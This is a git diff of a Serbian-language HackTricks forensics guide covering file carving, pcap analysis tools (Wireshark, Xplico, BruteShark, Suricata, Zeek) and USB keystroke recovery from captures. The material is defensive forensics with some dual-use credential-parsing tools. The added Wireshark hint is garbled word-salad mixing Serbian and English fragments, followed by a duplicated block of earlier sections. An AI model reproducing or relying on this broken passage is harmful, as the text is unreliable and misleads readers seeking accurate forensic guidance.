CLI. Možete odabrati **vrste datoteka** koje želite da PhotoRec pretražuje. +Dolazi sa GUI i CLI verzijom. Možete odabrati **tipove datoteka** koje želite da PhotoRec pretražuje. ![](../../../.gitbook/assets/image%20%28524%29.png) -# Specifični alati za izvlačenje podataka +# Specifični alati za izdvajanje podataka ## FindAES -Pretražuje AES ključeve tražeći njihove rasporede ključeva. Može pronaći ključeve od 128, 192 i 256 bita, poput onih koje koriste TrueCrypt i BitLocker. +Pretražuje AES ključeve tražeći njihove rasporede ključeva. Može pronaći 128, 192 i 256 bitne ključeve, poput onih koje koriste TrueCrypt i BitLocker. Preuzmite [ovde](https://sourceforge.net/projects/findaes/). # Komplementarni alati -Možete koristiti [**viu** ](https://github.com/atanunq/viu)da vidite slike iz terminala. -Možete koristiti linux alat komandne linije **pdftotext** da pretvorite PDF u tekst i pročitate ga. +Možete koristiti [**viu** ](https://github.com/atanunq/viu) da vidite slike iz terminala. +Možete koristiti linux komandnu liniju alat **pdftotext** da pretvorite pdf u tekst i pročitate ga. +{% hint style="success" %} +Naučite i vežbajte hakovanje AWS-a:[**HackTricks Obuka AWS Crveni Tim Stručnjak (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Naučite i vežbajte hakovanje GCP-a: [**HackTricks Obuka GCP Crveni Tim Stručnjak (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite videti **oglašavanje vaše kompanije u HackTricks-u** ili **preuzeti HackTricks u PDF formatu** Pogledajte [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Podelite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} diff --git a/forensics/basic-forensic-methodology/pcap-inspection/README.md b/forensics/basic-forensic-methodology/pcap-inspection/README.md index 7fa0603ee..ed789b291 100644 --- a/forensics/basic-forensic-methodology/pcap-inspection/README.md +++ b/forensics/basic-forensic-methodology/pcap-inspection/README.md @@ -1,34 +1,63 @@ # Pregled Pcap datoteka +{% hint style="success" %} +Naučite i vežbajte hakovanje AWS:[**HackTricks Obuka AWS Crveni Tim Stručnjak (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Naučite i vežbajte hakovanje GCP: [**HackTricks Obuka GCP Crveni Tim Stručnjak (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/ssponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Podelite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %}
-[**RootedCON**](https://www.rootedcon.com/) je najrelevantniji kibernetički događaj u **Španiji** i jedan od najvažnijih u **Evropi**. Sa **misijom promovisanja tehničkog znanja**, ovaj kongres je ključno mesto susreta tehnoloških i kibernetičkih profesionalaca u svakoj disciplini. +[**RootedCON**](https://www.rootedcon.com/) je najrelevantniji događaj u oblasti **kibernetičke bezbednosti** u **Španiji** i jedan od najvažnijih u **Evropi**. Sa **misijom promovisanja tehničkog znanja**, ovaj kongres je ključno mesto susreta tehnoloških i bezbednosnih stručnjaka u svakoj disciplini. {% embed url="https://www.rootedcon.com/" %} {% hint style="info" %} -Napomena o **PCAP** vs **PCAPNG**: postoje dve verzije PCAP formata; **PCAPNG je novija i nije podržana od svih alata**. Možda ćete morati da konvertujete datoteku iz PCAPNG u PCAP koristeći Wireshark ili drugi kompatibilni alat, kako biste je mogli koristiti u nekim drugim alatima. +Napomena o **PCAP** vs **PCAPNG**: postoje dve verzije PCAP formata datoteka; **PCAPNG je noviji i nije podržan od svih alata**. Možda ćete morati da konvertujete datoteku iz PCAPNG u PCAP koristeći Wireshark ili neki drugi kompatibilni alat, kako biste mogli da radite sa njom u nekim drugim alatima. {% endhint %} ## Online alati za pcap datoteke -* Ako je zaglavlje vaše pcap datoteke **oštećeno**, trebali biste pokušati da ga **popravite** koristeći: [http://f00l.de/hacking/**pcapfix.php**](http://f00l.de/hacking/pcapfix.php) -* Izdvojite **informacije** i pretražujte **malver** unutar pcap datoteke na [**PacketTotal**](https://packettotal.com) -* Pretražujte **zlonamerne aktivnosti** koristeći [**www.virustotal.com**](https://www.virustotal.com) i [**www.hybrid-analysis.com**](https://www.hybrid-analysis.com) +* Ako je zaglavlje vaše pcap datoteke **oštećeno**, trebalo bi da pokušate da ga **popravite** koristeći: [http://f00l.de/hacking/**pcapfix.php**](http://f00l.de/hacking/pcapfix.php) +* Izvucite **informacije** i tražite **malver** unutar pcap datoteke na [**PacketTotal**](https://packettotal.com) +* Tražite **zlonamerne aktivnosti** koristeći [**www.virustotal.com**](https://www.virustotal.com) i [**www.hybrid-analysis.com**](https://www.hybrid-analysis.com) + +## Izdvajanje informacija + +Sledeći alati su korisni za izdvajanje statistika, datoteka, itd. + +### Wireshark + +{% hint style="info" %} +**Ako ćete analizirati Famekor Wi** usingen**, ukivanć** usingounder leastcesfind theima-ref for ivoć** usingounder : ** Wi**:anal example theimaref theive URLomerefs Wi**:anal example theima-ref for yourte url Wi theiteore you theimaref the duaoive % URLec** usingoundive %est Wi relevant for ** Wi relevant for ** Wi relevant for ** Wi relevant for ** Wi relevant for ** Wi relevant for ** you Wi relevant for ** Wi relevant for ** Wi theau.** usingand a his for theau example the. xtop your online training, and the [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repositories. + + +{% endhint %} + +
+ +[**RootedCON**](https://www.rootedcon.com/) je najrelevantniji događaj u oblasti **kibernetičke bezbednosti** u **Španiji** i jedan od najvažnijih u **Evropi**. Sa **misijom promovisanja tehničkog znanja**, ovaj kongres je ključno mesto susreta tehnoloških i bezbednosnih stručnjaka u svakoj disciplini. + +{% embed url="https://www.rootedcon.com/" %} + +{% hint style="info" %} +Napomena o **PCAP** vs **PCAPNG**: postoje dve verzije PCAP formata datoteka; **PCAPNG je noviji i nije podržan od svih alata**. Možda ćete morati da konvertujete datoteku iz PCAPNG u PCAP koristeći Wireshark ili neki drugi kompatibilni alat, kako biste mogli da radite sa njom u nekim drugim alatima. +{% endhint %} + +## Online alati za pcap datoteke + +* Ako je zaglavlje vaše pcap datoteke **oštećeno**, trebalo bi da pokušate da ga **popravite** koristeći: [http://f00l.de/hacking/**pcapfix.php**](http://f00l.de/hacking/pcapfix.php) +* Izvucite **informacije** i tražite **malver** unutar pcap datoteke na [**PacketTotal**](https://packettotal.com) +* Tražite **zlonamerne aktivnosti** koristeći [**www.virustotal.com**](https://www.virustotal.com) i [**www.hybrid-analysis.com**](https://www.hybrid-analysis.com) ## Izdvajanje informacija @@ -40,7 +69,7 @@ Sledeći alati su korisni za izdvajanje statistika, datoteka, itd. **Ako ćete analizirati PCAP datoteku, osnovno je da znate kako koristiti Wireshark** {% endhint %} -Neki trikovi za Wireshark se mogu naći u: +Možete pronaći neke trikove za Wireshark u: {% content-ref url="wireshark-tricks.md" %} [wireshark-tricks.md](wireshark-tricks.md) @@ -48,7 +77,7 @@ Neki trikovi za Wireshark se mogu naći u: ### Xplico Framework -[**Xplico** ](https://github.com/xplico/xplico)_(samo za linux)_ može **analizirati** pcap datoteku i izvući informacije iz nje. Na primer, iz pcap datoteke Xplico izvlači svaki email (POP, IMAP i SMTP protokoli), sve HTTP sadržaje, svaki VoIP poziv (SIP), FTP, TFTP, itd. +[**Xplico** ](https://github.com/xplico/xplico)_(samo za linux)_ može **analizirati** pcap datoteku i izvući informacije iz nje. Na primer, iz pcap datoteke Xplico iz izvlači svaki email (POP, IMAP i SMTP protokoli), sve HTTP sadržaje, svaki VoIP poziv (SIP), FTP, TFTP, i tako dalje. **Instalacija** ```bash @@ -57,33 +86,33 @@ sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 791C25CE sudo apt-get update sudo apt-get install xplico ``` -**Pokretanje** +**Pokreni** ``` /etc/init.d/apache2 restart /etc/init.d/xplico start ``` Pristupite _**127.0.0.1:9876**_ sa pristupnim podacima _**xplico:xplico**_ -Zatim kreirajte **novi slučaj**, kreirajte **novu sesiju** unutar slučaja i **učitajte pcap** datoteku. +Zatim kreirajte **novi slučaj**, napravite **novu sesiju** unutar slučaja i **učitajte pcap** datoteku. ### NetworkMiner -Kao i Xplico, ovo je alat za **analizu i izdvajanje objekata iz pcap datoteka**. Ima besplatno izdanje koje možete **preuzeti** [**ovde**](https://www.netresec.com/?page=NetworkMiner). Radi na **Windows**-u.\ -Ovaj alat je takođe koristan za dobijanje **drugih analiziranih informacija** iz paketa kako biste mogli brže saznati šta se dešavalo. +Kao i Xplico, ovo je alat za **analizu i izdvajanje objekata iz pcap-ova**. Ima besplatno izdanje koje možete **preuzeti** [**ovde**](https://www.netresec.com/?page=NetworkMiner). Radi sa **Windows**-om.\ +Ovaj alat je takođe koristan za dobijanje **ostalih informacija analiziranih** iz paketa kako biste mogli znati šta se dešavalo na **brži** način. ### NetWitness Investigator -Možete preuzeti [**NetWitness Investigator odavde**](https://www.rsa.com/en-us/contact-us/netwitness-investigator-freeware) **(Radi na Windows-u)**.\ -Ovo je još jedan koristan alat koji **analizira pakete** i sortira informacije na koristan način kako biste **znali šta se dešava unutar**. +Možete preuzeti [**NetWitness Investigator ovde**](https://www.rsa.com/en-us/contact-us/netwitness-investigator-freeware) **(Radi na Windows-u)**.\ +Ovo je još jedan koristan alat koji **analizira pakete** i sortira informacije na koristan način kako biste **znali šta se dešava unutra**. ### [BruteShark](https://github.com/odedshimon/BruteShark) * Izdvajanje i enkodiranje korisničkih imena i lozinki (HTTP, FTP, Telnet, IMAP, SMTP...) -* Izdvajanje autentifikacionih heševa i njihovo pucanje koristeći Hashcat (Kerberos, NTLM, CRAM-MD5, HTTP-Digest...) -* Izgradnja vizuelnog dijagrama mreže (Mrežni čvorovi i korisnici) +* Izdvajanje autentifikacionih heševa i njihovo pucanje korišćenjem Hashcat-a (Kerberos, NTLM, CRAM-MD5, HTTP-Digest...) +* Izgradnja vizuelnog dijagrama mreže (Mrežni čvorovi & korisnici) * Izdvajanje DNS upita -* Rekonstrukcija svih TCP i UDP sesija -* Izdvajanje fajlova +* Rekonstrukcija svih TCP & UDP sesija + * Rezanje datoteka ### Capinfos ``` @@ -91,13 +120,13 @@ capinfos capture.pcap ``` ### Ngrep -Ako **tražite** nešto unutar pcap datoteke, možete koristiti **ngrep**. Evo primera korišćenja osnovnih filtera: +Ako **tražite** nešto unutar pcap datoteke,**možete** koristiti **ngrep**. Evo primera korišćenja osnovnih filtera: ```bash ngrep -I packets.pcap "^GET" "port 80 and tcp and host 192.168 and dst host 192.168 and src host 192.168" ``` -### Isecanje +### Rezanje -Korišćenje uobičajenih tehnika isečenja može biti korisno za izvlačenje fajlova i informacija iz pcap fajla: +Korišćenje uobičajenih tehnika rezanja može biti korisno za izvlačenje datoteka i informacija iz pcap datoteke: {% content-ref url="../partitions-file-systems-carving/file-data-carving-recovery-tools.md" %} [file-data-carving-recovery-tools.md](../partitions-file-systems-carving/file-data-carving-recovery-tools.md) @@ -105,15 +134,15 @@ Korišćenje uobičajenih tehnika isečenja može biti korisno za izvlačenje fa ### Snimanje akreditacija -Možete koristiti alate poput [https://github.com/lgandx/PCredz](https://github.com/lgandx/PCredz) za parsiranje akreditacija iz pcap fajla ili sa živog interfejsa. +Možete koristiti alate poput [https://github.com/lgandx/PCredz](https://github.com/lgandx/PCredz) za parsiranje akreditacija iz pcap datoteke ili sa live interfejsa.
-[**RootedCON**](https://www.rootedcon.com/) je najrelevantniji sajber bezbednosni događaj u **Španiji** i jedan od najvažnijih u **Evropi**. Sa **misijom promovisanja tehničkog znanja**, ovaj kongres je ključno mesto susreta tehnoloških i sajber bezbednosnih profesionalaca u svakoj disciplini. +[**RootedCON**](https://www.rootedcon.com/) je najrelevantniji događaj u oblasti **kibernetičke bezbednosti** u **Španiji** i jedan od najvažnijih u **Evropi**. Sa **misijom promovisanja tehničkog znanja**, ovaj kongres je ključno mesto susreta tehnoloških i stručnjaka za kibernetičku bezbednost u svakoj disciplini. {% embed url="https://www.rootedcon.com/" %} -## Provera Exploita/Malvera +## Provera Eksploatacija/Malvera ### Suricata @@ -124,51 +153,21 @@ apt-get install oinkmaster echo "url = http://rules.emergingthreats.net/open/suricata/emerging.rules.tar.gz" >> /etc/oinkmaster.conf oinkmaster -C /etc/oinkmaster.conf -o /etc/suricata/rules ``` -**Proverite pcap** - ---- - -**Description:** - -A pcap file is a packet capture file that contains network traffic data. It is commonly used in network forensics to analyze and investigate network activities. By inspecting a pcap file, you can gain valuable insights into the communication between different hosts on a network. - -**Instructions:** - -To check a pcap file, you can use various tools such as Wireshark, tcpdump, or tshark. These tools allow you to open and analyze the contents of the pcap file. - -1. Open the pcap file using Wireshark: - ``` - wireshark - ``` - -2. Analyze the network traffic: - - Look for any suspicious or abnormal network activities. - - Identify the source and destination IP addresses. - - Examine the protocols used (e.g., HTTP, FTP, DNS). - - Check for any potential security breaches or unauthorized access attempts. - -3. Use filters to narrow down the analysis: - - Apply filters to focus on specific protocols, IP addresses, or ports. - - Use display filters to show only relevant packets. - -4. Export relevant packets: - - If you find any packets of interest, you can export them for further analysis or evidence collection. - -By carefully inspecting the pcap file, you can uncover valuable information about network traffic patterns, potential security incidents, or even evidence of malicious activities. +**Provera pcap-a** ``` suricata -r packets.pcap -c /etc/suricata/suricata.yaml -k none -v -l log ``` ### YaraPcap -[**YaraPCAP**](https://github.com/kevthehermit/YaraPcap) je alat koji +[**YaraPCAP**](https://github.com/kevthehermit/YaraPcap) je alatka koja -* Čita PCAP datoteke i izvlači HTTP tokove. -* gzip dekompresuje sve komprimirane tokove -* Skenira svaku datoteku sa yara +* Čita PCAP datoteku i izvlači HTTP tokove. +* gzip dekompresuje bilo koje kompresovane tokove +* Skenira svaku datoteku pomoću yara * Piše izveštaj.txt -* Opciono čuva podudarajuće datoteke u direktorijumu +* Opciono čuva podudarne datoteke u direktorijumu -### Analiza malvera +### Analiza Malvera Proverite da li možete pronaći bilo kakav otisak poznatog malvera: @@ -178,9 +177,9 @@ Proverite da li možete pronaći bilo kakav otisak poznatog malvera: ## Zeek -> [Zeek](https://docs.zeek.org/en/master/about.html) je pasivni, open-source analizator mrežnog saobraćaja. Mnogi operateri koriste Zeek kao mrežni sigurnosni monitor (NSM) kako bi podržali istrage sumnjive ili zlonamerne aktivnosti. Zeek takođe podržava širok spektar zadataka analize saobraćaja izvan domena sigurnosti, uključujući merenje performansi i otklanjanje problema. +> [Zeek](https://docs.zeek.org/en/master/about.html) je pasivni, open-source analizator saobraćaja na mreži. Mnogi operateri koriste Zeek kao Monitor za bezbednost mreže (NSM) kako bi podržali istrage sumnjive ili zlonamerne aktivnosti. Zeek takođe podržava širok spektar zadataka analize saobraćaja izvan domena bezbednosti, uključujući merenje performansi i rešavanje problema. -U osnovi, zapisi koje kreira `zeek` nisu **pcap** datoteke. Stoga će vam biti potrebni **drugim alati** za analizu zapisa gde se nalaze **informacije** o pcap datotekama. +U osnovi, zapisi kreirani od strane `zeek` nisu **pcap** datoteke. Stoga će vam biti potrebni **drugi alati** za analizu zapisa gde se nalaze **informacije** o pcap datotekama. ### Informacije o konekcijama ```bash @@ -233,23 +232,6 @@ Score,Source IP,Destination IP,Connections,Avg Bytes,Intvl Range,Size Range,Top 0.838,10.55.200.10,205.251.194.64,210,69,29398,4,300,70,109,205,0,0,0,0 ``` ### DNS informacije - -Kada analizirate pakete u PCAP datoteci, možete pronaći korisne informacije o DNS upitima i odgovorima. Ove informacije mogu biti korisne za identifikaciju komunikacije sa sumnjivim ili zlonamjernim domenama. - -Da biste pristupili DNS informacijama, možete koristiti alate kao što su `tshark` ili `Wireshark`. Evo nekoliko koraka koje možete slijediti: - -1. Pokrenite `tshark` ili otvorite PCAP datoteku u `Wireshark`-u. -2. Primijenite filter za DNS pakete kako biste ograničili prikaz samo na DNS komunikaciju. -3. Pregledajte DNS upite i odgovore kako biste pronašli korisne informacije. - -Ovdje su neke od informacija koje možete pronaći u DNS paketima: - -- **Domena**: Prikazuje se domena koja se traži u DNS upitu. -- **IP adresa**: Prikazuje se IP adresa koja je povezana s domenom. -- **Tip zapisa**: Prikazuje se vrsta DNS zapisa, kao što su A, AAAA, CNAME, MX itd. -- **Vrijeme života (TTL)**: Prikazuje se koliko dugo DNS zapis ostaje u kešu. - -Analizirajući ove informacije, možete dobiti uvid u komunikaciju koja se odvija putem DNS-a i identificirati potencijalne sigurnosne prijetnje. ```bash #Get info about each DNS request performed cat dns.log | zeek-cut -c id.orig_h query qtype_name answers @@ -266,7 +248,7 @@ cat dns.log | zeek-cut qtype_name | sort | uniq -c | sort -nr #See top DNS domain requested with rita rita show-exploded-dns -H --limit 10 zeek_logs ``` -## Ostale trikove analize pcap datoteka +## Ostale trikove analize pcap-a {% content-ref url="dnscat-exfiltration.md" %} [dnscat-exfiltration.md](dnscat-exfiltration.md) @@ -284,20 +266,21 @@ rita show-exploded-dns -H --limit 10 zeek_logs
-[**RootedCON**](https://www.rootedcon.com/) je najrelevantniji kibernetički događaj u **Španiji** i jedan od najvažnijih u **Evropi**. Sa **misijom promovisanja tehničkog znanja**, ovaj kongres je ključno mesto susreta tehnoloških i kibernetičkih profesionalaca u svakoj disciplini. +[**RootedCON**](https://www.rootedcon.com/) je najrelevantniji događaj u oblasti **kibernetičke bezbednosti** u **Španiji** i jedan od najvažnijih u **Evropi**. Sa **misijom promovisanja tehničkog znanja**, ovaj kongres je ključno mesto susreta tehnoloških i stručnjaka za kibernetičku bezbednost u svakoj disciplini. {% embed url="https://www.rootedcon.com/" %} +{% hint style="success" %} +Naučite i vežbajte hakovanje AWS:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Naučite i vežbajte hakovanje GCP: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju oglašenu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Podelite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} diff --git a/forensics/basic-forensic-methodology/pcap-inspection/usb-keyboard-pcap-analysis.md b/forensics/basic-forensic-methodology/pcap-inspection/usb-keyboard-pcap-analysis.md index cd6ea6c40..9f5c61489 100644 --- a/forensics/basic-forensic-methodology/pcap-inspection/usb-keyboard-pcap-analysis.md +++ b/forensics/basic-forensic-methodology/pcap-inspection/usb-keyboard-pcap-analysis.md @@ -1,23 +1,24 @@ +{% hint style="success" %} +Naučite i vežbajte AWS hakovanje:[**HackTricks Obuka AWS Crveni Tim Stručnjak (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Naučite i vežbajte GCP hakovanje: [**HackTricks Obuka GCP Crveni Tim Stručnjak (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Delite hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} -Ako imate pcap fajl sa USB konekcijom sa puno prekida, verovatno je to USB tastatura konekcija. +Ako imate pcap fajl USB konekcije sa puno prekida, verovatno je u pitanju USB tastatura konekcija. Wireshark filter poput ovog može biti koristan: `usb.transfer_type == 0x01 and frame.len == 35 and !(usb.capdata == 00:00:00:00:00:00:00:00)` -Važno je znati da podaci koji počinju sa "02" su pritisnuti koristeći shift. +Važno je znati da se podaci koji počinju sa "02" pritiskaju koristeći shift. Možete pročitati više informacija i pronaći neke skripte o tome kako analizirati ovo na: @@ -26,16 +27,17 @@ Možete pročitati više informacija i pronaći neke skripte o tome kako analizi +{% hint style="success" %} +Naučite i vežbajte AWS hakovanje:[**HackTricks Obuka AWS Crveni Tim Stručnjak (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Naučite i vežbajte GCP hakovanje: [**HackTricks Obuka GCP Crveni Tim Stručnjak (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Delite hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} diff --git a/forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md b/forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md index 0758bbe4e..4d730253f 100644 --- a/forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md +++ b/forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md @@ -1,43 +1,45 @@ +{% hint style="success" %} +Učite i vežbajte AWS hakovanje:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Učite i vežbajte GCP hakovanje: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Podelite hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} -Ako imate pcap koji sadrži komunikaciju preko USB-a tastature kao što je sledeći: +Ako imate pcap koji sadrži komunikaciju putem USB tastature kao što je sledeći: ![](<../../../.gitbook/assets/image (613).png>) -Možete koristiti alat [**ctf-usb-keyboard-parser**](https://github.com/carlospolop-forks/ctf-usb-keyboard-parser) da biste dobili šta je napisano u komunikaciji: +Možete koristiti alat [**ctf-usb-keyboard-parser**](https://github.com/carlospolop-forks/ctf-usb-keyboard-parser) da biste saznali šta je napisano u komunikaciji: ```bash tshark -r ./usb.pcap -Y 'usb.capdata && usb.data_len == 8' -T fields -e usb.capdata | sed 's/../:&/g2' > keystrokes.txt python3 usbkeyboard.py ./keystrokes.txt ``` -Više informacija i neke skripte o tome kako analizirati ovo možete pronaći na: +Možete pročitati više informacija i pronaći neke skripte o tome kako analizirati ovo na: * 